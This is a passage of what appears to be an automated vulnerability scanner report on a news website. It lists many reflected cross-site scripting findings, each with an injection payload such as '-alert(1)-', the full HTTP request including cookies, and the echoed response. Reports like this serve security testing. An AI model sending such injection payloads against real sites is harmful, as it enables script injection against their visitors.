<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... e="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/in-the-future-computing-is-cunningly-constant--1800b76c4'-alert(1)-'c5a8d6b261c/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.92. http://www.technewsdaily.com/in-the-future-computing-is-cunningly-constant--1800/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b686'-alert(1)-'7185b76cb5b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /in-the-future-computing-is-cunningly-constant--1800/?1b686'-alert(1)-'7185b76cb5b=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:53:04 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:53:04 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 70513
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... "text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/in-the-future-computing-is-cunningly-constant--1800/?1b686'-alert(1)-'7185b76cb5b=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 183a4'-alert(1)-'5ed71200d1a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /183a4'-alert(1)-'5ed71200d1a HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:51:53 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:51:53 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40394
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/183a4'-alert(1)-'5ed71200d1a",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.94. http://www.technewsdaily.com/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.technewsdaily.com
Path:
/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42a94'-alert(1)-'cb3bb5c705 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index.php?42a94'-alert(1)-'cb3bb5c705=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:51:43 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:51:43 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40420
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/index.php?42a94'-alert(1)-'cb3bb5c705=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 92e52'-alert(1)-'f823a0cd3f8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /iphone-or-blackberry-your-choice-lies-in-gadget-envy--146992e52'-alert(1)-'f823a0cd3f8/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:56:52 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:56:52 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40514
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... /javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/iphone-or-blackberry-your-choice-lies-in-gadget-envy--146992e52'-alert(1)-'f823a0cd3f8/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.96. http://www.technewsdaily.com/iphone-or-blackberry-your-choice-lies-in-gadget-envy--1469/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f133'-alert(1)-'f95fe139dd4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /iphone-or-blackberry-your-choice-lies-in-gadget-envy--1469/?1f133'-alert(1)-'f95fe139dd4=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:56:37 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:56:37 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 64587
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... avascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/iphone-or-blackberry-your-choice-lies-in-gadget-envy--1469/?1f133'-alert(1)-'f95fe139dd4=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.97. http://www.technewsdaily.com/iphone-or-blackberry-your-choice-lies-in-gadget-envy--1469/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81c1a"><a>0158e735c64 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /iphone-or-blackberry-your-choice-lies-in-gadget-envy--1469/?81c1a"><a>0158e735c64=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:56:23 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:56:24 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 64949
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... <link rel="canonical" src="http://www.technewsdaily.com/iphone-or-blackberry-your-choice-lies-in-gadget-envy--1469/?81c1a"><a>0158e735c64=1/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a89f'-alert(1)-'94ec8f532ee was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /is-windows-phone-7-a-flop-18265a89f'-alert(1)-'94ec8f532ee/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:53:06 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:53:06 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40458
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/is-windows-phone-7-a-flop-18265a89f'-alert(1)-'94ec8f532ee/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.99. http://www.technewsdaily.com/is-windows-phone-7-a-flop-1826/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.technewsdaily.com
Path:
/is-windows-phone-7-a-flop-1826/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8c08'-alert(1)-'dbbffb4d24a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /is-windows-phone-7-a-flop-1826/?b8c08'-alert(1)-'dbbffb4d24a=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:53:01 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:53:01 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 66897
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/is-windows-phone-7-a-flop-1826/?b8c08'-alert(1)-'dbbffb4d24a=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c22c'-alert(1)-'f93007712bc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /job-seekers-most-overused-buzzwords-revealed-18082c22c'-alert(1)-'f93007712bc/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:57:02 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:57:02 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40496
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... ype="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/job-seekers-most-overused-buzzwords-revealed-18082c22c'-alert(1)-'f93007712bc/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.101. http://www.technewsdaily.com/job-seekers-most-overused-buzzwords-revealed-1808/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2168d'-alert(1)-'3dfee23b27 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /job-seekers-most-overused-buzzwords-revealed-1808/?2168d'-alert(1)-'3dfee23b27=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:56:49 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:56:49 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 63231
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... e="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/job-seekers-most-overused-buzzwords-revealed-1808/?2168d'-alert(1)-'3dfee23b27=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.102. http://www.technewsdaily.com/job-seekers-most-overused-buzzwords-revealed-1808/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49567"><a>81c479c6611 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /job-seekers-most-overused-buzzwords-revealed-1808/?49567"><a>81c479c6611=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:56:32 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:56:32 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 63623
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... <link rel="canonical" src="http://www.technewsdaily.com/job-seekers-most-overused-buzzwords-revealed-1808/?49567"><a>81c479c6611=1/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 96e12'-alert(1)-'f0d7d5560f1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /lasers-could-defend-helicopters-against-missiles--117296e12'-alert(1)-'f0d7d5560f1/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:56:12 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:56:13 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40506
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/lasers-could-defend-helicopters-against-missiles--117296e12'-alert(1)-'f0d7d5560f1/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.104. http://www.technewsdaily.com/lasers-could-defend-helicopters-against-missiles--1172/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ba2f'-alert(1)-'7cf0f87ab98 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /lasers-could-defend-helicopters-against-missiles--1172/?6ba2f'-alert(1)-'7cf0f87ab98=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:56:00 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:56:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 64146
